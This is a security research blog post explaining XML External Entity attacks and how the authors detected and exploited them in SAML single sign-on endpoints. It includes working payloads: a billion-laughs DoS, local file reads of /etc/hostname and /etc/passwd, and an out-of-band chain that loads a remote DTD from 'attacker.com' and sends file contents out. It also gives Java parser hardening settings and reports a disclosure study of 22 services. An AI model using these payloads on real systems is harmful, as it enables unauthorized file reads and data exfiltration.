This post will describe some findings, problems and inisghts regarding XML External Entity Attacks (XXEA) that we gathered during a large-scale security analysis of several SAML interfaces.
XXEA has been a popular attack class in the last months, see for example

How we got read access on Google’s production servers
XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

This post will explain the basics of XXEA and how to adopt them to SAML, including some special problems you have to cope with.

First, we introduce the concept of Document Type Definition (DTD) and XML External Entity (XXE), and afterwards some basics on SAML. If you are fimiliar with these concepts, you may want to skip these sections and go to the last section XXEA on SAML.

Document Type Definition (DTD) and XML External Entity (XXE)

Understanding DTD

XML offers the possibility to describe the document’s structure
by using a Document Type Definition (DTD).
This is well known from classical HTML documents:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
...

Many people think that the declaration above just indicates that the content within the document contains HTML 4.01 data, but technically, there is more.
This declaration defines the HTML doctype that is identified by "-//W3C//DTD HTML 4.01 Transitional//EN". The exact definition is publicy available and the URL contains its declaration:

% curl -D- http://www.w3.org/TR/html4/loose.dtd

HTTP/1.1 200 OK
...
Content-Type: text/plain

<!ENTITY % HTML.Version "-//W3C//DTD HTML 4.01 Transitional//EN"
<!ENTITY % HTML.Frameset "IGNORE">
<!ENTITY % ContentType "CDATA"

...

It now depends on the document parser whether this URL is resolved or not. There are good reasons not to curl the DTD every time, for instance, to save time. Additionally, it is not needed for HTML because this DTD is well known and most probably hard-coded in any browser.

Understanding XML Entity

However, the concept of DTD is generic and offers more features, for example, a DTD allows to define an ENTITY:

<!DOCTYPE Response [
<!ENTITY msg 'Hello World'>
]>

<Response>&msg;</Response>

In this case, the Entity msg is defined as the String 'Hello World'. This concept is also very wide-spread in HTML, for example, < (<) or & (&) can be used to encode specific characters (these are default HTML Entities that are defined by the DTD).

Technically, the XML/HTML parser that processes the given document resolves each ENTITY, for instance, it replaces &msg; by the String 'Hello World'.

Entity resolving is not problematic per se, but it can lead to efficient Denial-of-Service (DoS) Attacks if used like this:

<!DOCTYPE Response [
<!ENTITY a 'aaaaaa'>
<!ENTITY b '&a;&a;&a;&a;&a;'>
<!ENTITY c '&b;&b;&b;&b;&b;'>
...
<!ENTITY z '&y;&y;&y;&y;&y;'>
]>

<Response>&z;</Response>

By parsing this message, the entity &z; is recursively resolved, which leads to high memory consumption.This attack is also known as the Billion laughs attack.

Understanding XML External Entity

In addition to XML Entities, DTDs offer the ability to define External Entities. The concept is similar to the HTML definition above:

<!DOCTYPE Message [
<!ENTITY msg SYSTEM '/etc/hostname'>
]>

<Message>&msg;</Message>

Instead of defining a simple string for the Entity msg in this example,it is possible to let the document parser load the content of a specified file, for instance, the '/etc/hostname' file.
There are several ways to do this:

<!ENTITY msg SYSTEM '/etc/hostname'>
<!ENTITY msg SYSTEM 'file:///etc/hostname'>
<!ENTITY msg SYSTEM 'http:///myserver.com/something'><!ENTITY msg PUBLIC 'm' '/etc/hostname'><!ENTITY msg PUBLIC 'm' 'file:///etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'http:///myserver.com/something'>

The examples above differ mainly in two aspects:

SYSTEM vs PUBLIC: As indicated by the name, the SYSTEM Entities are intended to be for files locally stored on the machine, whereas PUBLIC are for contents accessible from the internet, for example, the HTML definition as mentioned earlier. PUBLIC Entities need an identifier (here: 'm') but the value of the identifier does not matter.
The protocol. Depending on the parser (the programming language), it is possible to use the absolute path of a file, or to use the file:// protocol. Most parsers additionally understand the http:// and https:// handler and, for instance, Java also allows to use jar:// protocol (which basically allows to unzip files).

XML External Entity Attack (XXEA)

An XML External Entity Attack works as follows:

The attacker prepares an XML message together with a DTD as shown above. This message commonly includes an XXE that reads a locally stored file, for example '/etc/hostname'.
The attacker sends the prepared XML message to the Web Application.
The Web Application processes the incoming XML message.
It parses the DTD, resolves the XXE, and then deals with the resultung XML.
The Web Application send an HTTP response to the attacker.
For a successful XXEA, this response must somehow contain the content of the locally stored file, for example the '/etc/hostname' file.
On a very basic level, this can be compared to reflective XSS.

Preventing XXEA

Given the number of possibilities to mount an XXEA, its prevention is not that easy. It is additionally alarming that most XML parser has enabled DTD processing (and therefore process XXE in most cases) by default.

This is, for instance, the case for the default Java XML parser. To mitigate XXEA, one has to configure the parser as follows:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// not important to prevent XXEA
dbf.setNamespaceAware(true);

// validate document while parsing it
dbf.setValidating(true);

// do not expand entity reference nodes 
dbf.setExpandEntityReferences(false);

// validate document against DTD
dbf.setFeature("http://xml.org/sax/features/validation", true);

// do not include external general entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

// do not include external parameter entities or the external DTD subset
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

// build the grammar but do not use the default attributes and attribute types information it contains
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-dtd-grammar", false);

// ignore the external DTD completely
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

Security Assertion Markup Language (SAML)

The most important industry standard for Identity Management is the SecurityAssertion Markup Language (SAML) . SAML is based on the eXtensible Markup Language (XML) and enables the secure exchange of XML-based authentication messages.
In conjunction with Single Sign-On (SSO) systems, SAML especially offers a standardized format for authentication tokens.

The good thing first:

For understanding how XXEA can be used in SAML, it is not necessary to understand how SAML exactly works.

All we need to know is:

SAML Assertions are XML. This fact allows us to include a DTD.
The XML message is transmitted to the server as an URL-Encoded plus Base64-Encoded String.

The bad thing about SAML and XXEA is that applications which verifies the SAML Assertions commonly do not reflect any content.
This means, that in contrast to the first given XXEA example, we are only able to read the content of a system resource using XXE, but we cannot simply send this content somewhere else so that it becomes accessible to the attacker.

The Figure above illustrates the problem. The only thing that is sent back to the user (attacker) is whether the login was successful or not. During our study, only few applications responded with a specific error message, but in no case this message reflected any content from the SAML-Assertion.
Thus, we had to find another way to retrieve the content of system resources.

XXEA on SAML

Detection Phase

Before we executed the XXEA, we started with the detection phase.
A requirement for an XXEA is:

The server processes DTD.
XXE is allowed and processed within the DTD.

To detect if these requirements are fulfilled, we send the following request (Encoded with Base64 plus URL) to the SAML URL Endpoint of the Web Application:

<!DOCTYPE Message [
<!ENTITY send SYSTEM "http://attacker.com/working">
]>
<Message>&send;</Message>

We setup a Web Server reachable at the domain "http://attacker.com". If the targeted Web Application processes the DTD correctly, our Web Server receives a GET request and XXEA might be possible.

If we do not receive a GET request, we will try the same idea but with PUBLIC instead of SYSTEM, because some parsers might disable SYSTEM processing while PUBLIC is still allowed.

Exploit Phase

Since Web Applications using SAML do not reflect content from the SAML-Assertion, we wanted to send the content of the system resource as a GET parameter to our own server (http://attacker.com).
The basic Idea looks as follows:

<!DOCTYPE Message [
<!ENTITY file SYSTEM "/etc/hostname">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<Message>&send;</Message>

The code above does not work directly.
This is due to the fact, that External Entities must not be included in other External Entities. This means, that most parsers will abort the DTD processing on finding the file Entity within the send Entity declaration.

Nevertheless, another DTD feature called Parameter Entities exists that allows to bypass this restriction. The idea is described in a Whitepaper on DTD and XXE Attacks by Morgan et. al.

<!DOCTYPE Message [
<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % dtd SYSTEM 'http://attacker.com/mydtd'>
%dtd;]>
<Message>&send;</Message>

The above content is then Base64 plus URL-encoded and sent to the SAML-Endpoint URL of the Web Application. Please note, that the Entity send within the <Message> Element is not directly defined in the DTD. It will be defined in the DTD that is loaded from 'http://attacker.com/mydtd' later on.

The Parameter Entities look similar to common Entities but start with a percentage character (%). They can be seen as a Meta Language for DTD (comparable to #DEFINE instructions in C/C++).
The Web Application processes the DTD as follows:

The parser processes the first Parameter Entity % file, thus reading the content of the /etc/hostname system resource.
It then processes the second Parameter Entity % dtd.
This one enforces the parser to load an External DTD that is provided by the attacker's HTTP server.

Server responds with:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/send/%file;'>">
%all;
This file is immediately parsed and processed.
It defines a Parameter Entity % all that declares an Entity send.
The send Entity is an External Entity pointing again to the attacker's server. The URL Request contains the content of the file Parameter Entity.
The last line contains only "%all;". This means, that at this place, the content of the %all Entity will be placed. This is the declaration of the send Entity.
The last line of the attacker's request contains "%dtd;" - this means, that at this place, the content of the the File
'http://attacker.com/mydtd' will be placed.
This is (again) the declaration of the send Entity.
Once the Web Application processes the line "<Response>&send;</Response>", the GET Request 'http://attacker.com/send/%file;' is executed and the attacker receives the content of the
'/etc/hostname' file.

Problems with this approach and their solutions

During our study, we found some interesting problems.

Firewall

Most Web Application are behind a firewall. At the beginning of our evaluation, we used a Web Server that was reachable on http://attacker.com:9090. The problem with this approach was, that some Web Applications were not allowed to send GET request to Port 9090 due to firewall policies.
Once we changed our Server port to 80 (default HTTP), the detection phase was successful.

Special Characters and Linefeed

For the exploit phase, the attacker has to chose which file he wants to read. We tried different ones. Most popular is reading the '/etc/passwd' file.
However, this file might include whitespaces, linefeeds and special characters.
Depending on the target Web Application and its XML parser, the file can cause problems. For example, within the GET request, they can break the parsing process, or characters like '<' can produce invalid XML, so that it is not parseable.

Thus, we prefer to use the file '/etc/hostname' for testing purposes.

In PHP, there is a nice possibility to read arbitrary files by encoding it directly with Base64:

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >

Load Balancers

We could detect a strange behavior on some Web Applications.
We sent several XXEA messages to them and tried to read the '/etc/hostname' file. It failed in some cases, but in other tries it was successful.

This is due to the fact, that the Web Application was behind a load balancer that deligates the requests to different servers.
On some of them, the '/etc/hostname' file exists, on other, it doesn't. This is, for example, the case for CentOS Servers.

We looked at the User-Agent of the Web Application that sends the request to attacker.com and found out that they differ randomly, for instance, User-Agent: Java/1.6.0_45 and User-Agent: Java/1.7.0_55. This indicates that different Servers process the requests.

Evaluation Results

During our study, we have evaluated 22 Software-as-a-Service Web Applications that support Single Sign-On via SAML.
Ten out of them were vulnerable to XXEA and we have reported our results to them.

Conclusion

Our study showed, that XXEA is a real threat to SAML Applications. The biggest problem is, that DTD processing, which is a must requirement for XXEA, is enabled by default in most XML parsers, but developers seem not to be aware of that feature.

The full paper can be found here:

http://nds.rub.de/research/publications/saml-saas/

Authors of this Post

Vladislav Mladenov
Christian Mainka (@CheariX)

Detecting and exploiting XXE in SAML Interfaces